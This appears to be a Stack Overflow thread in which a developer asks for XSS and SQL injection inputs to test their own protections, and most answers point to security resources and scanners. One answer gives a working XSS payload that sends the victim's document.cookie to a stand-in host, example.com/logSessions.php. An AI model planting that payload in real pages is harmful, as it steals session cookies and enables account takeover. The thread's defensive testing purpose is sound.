Reputation: 2492
Can someone give me some basic XSS and sql injection scripts? (not what it seems)
I am testing out my scripts to see if they will prevent xss and sql injections. Can someone provide me with some basic but good scripts that would "hack" into my programs. I want to test my scripts before it goes online.
EDIT: Thank you all for those links, they contain loads and loads of information. But for a beginner to security, is there a recommended site that's? I'm not sure if I am ready to dive straight into in-dept security issues. I like the links waiwai933 recommended.
Upvotes: 10
Views: 3194
Answers (7)
Reputation: 81404
The most simple one which doesn't get blocked by browsers and can happen easily if you don't strip_tags() is the following code:
<script>(new Image).src = 'http://example.com/logSessions.php?s=' + document.cookie;</script>
Upvotes: 1
Reputation: 7042
You can try with Acunetix Security Scanner, it won't scan only for XSS and MySQL injection by default but even for other sort of exploits. The program practically emulates a browser and can behave as a logged in user.
Upvotes: 0
Reputation: 28190
The XSS cheatsheet at http://ha.ckers.org/xss.html is a good collection of XSS tests. I would not recommend implementing your own XSS checker, though; it is a lot harder than detecting SQL injections (as you will probably realize upon seeing some of the examples in the cheatsheet). The only solid method is to parse the code, build a DOM tree from it and transform that tree back to HTML, and that is a lot of work, and other people have done it already. Use something like HTML Purifier.
Upvotes: 2
Reputation: 18780
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
I have used this tool to some great results.
Upvotes: 1
Reputation: 73564
+1 for caring and knowing enough to ask. Since you're asking security questions I'd like to recommend the OWASP web site if you're not already familiar. You'll find all sorts of information over and above what you've asked., not to mention tons of info on preventing all sorts of attacks. The site is an invaluable tool for web developers.
Upvotes: 1
Reputation: 14559
Each situation requires different scripts, so there is no 'one size fits all' that anyone could provide. The list of scripts that would need to be tested goes into the thousands before you can be certain that your site is safe.
You may want to check Firefox or Chrome plugins which allow you to test SQL injections. I suggest this one, but you may want to look for others as well: https://addons.mozilla.org/en-US/firefox/addon/6727. What this does is that it allows you to provide a list of injection scripts, which it probably provides a few by default, and then once you activate it, it bombards your site with these scripts and lets you see where the vulnerabilities are.
I suggest this site for some example XSS scripts: http://ha.ckers.org/xss.html
Upvotes: 5
Reputation: 881873
Googe's new jarslberg instructional site is a great resource to teach you how to write and defend against XSS and several other security attacks.
Upvotes: 1
Related Questions
- A PHP function to prevent SQL Injections and XSS
- Security strategies in PHP website: SQL Injection, XSS attack and 2nd order SQL Injection
- PHP Security checklist (injection, sessions etc)
- Ways I can protect my site excluding XSS and Sql injection?
- Security and php
- Will these security functions be enough?
- preventing xss in jquery, php, mysql in some examples - please advice
- Basic SQL Injections?
- What are the best practices to avoid XSS and SQL Injections attacks (platform agnostics)?
- what more can I do to prevent myself from XSS injection & SQL Injection?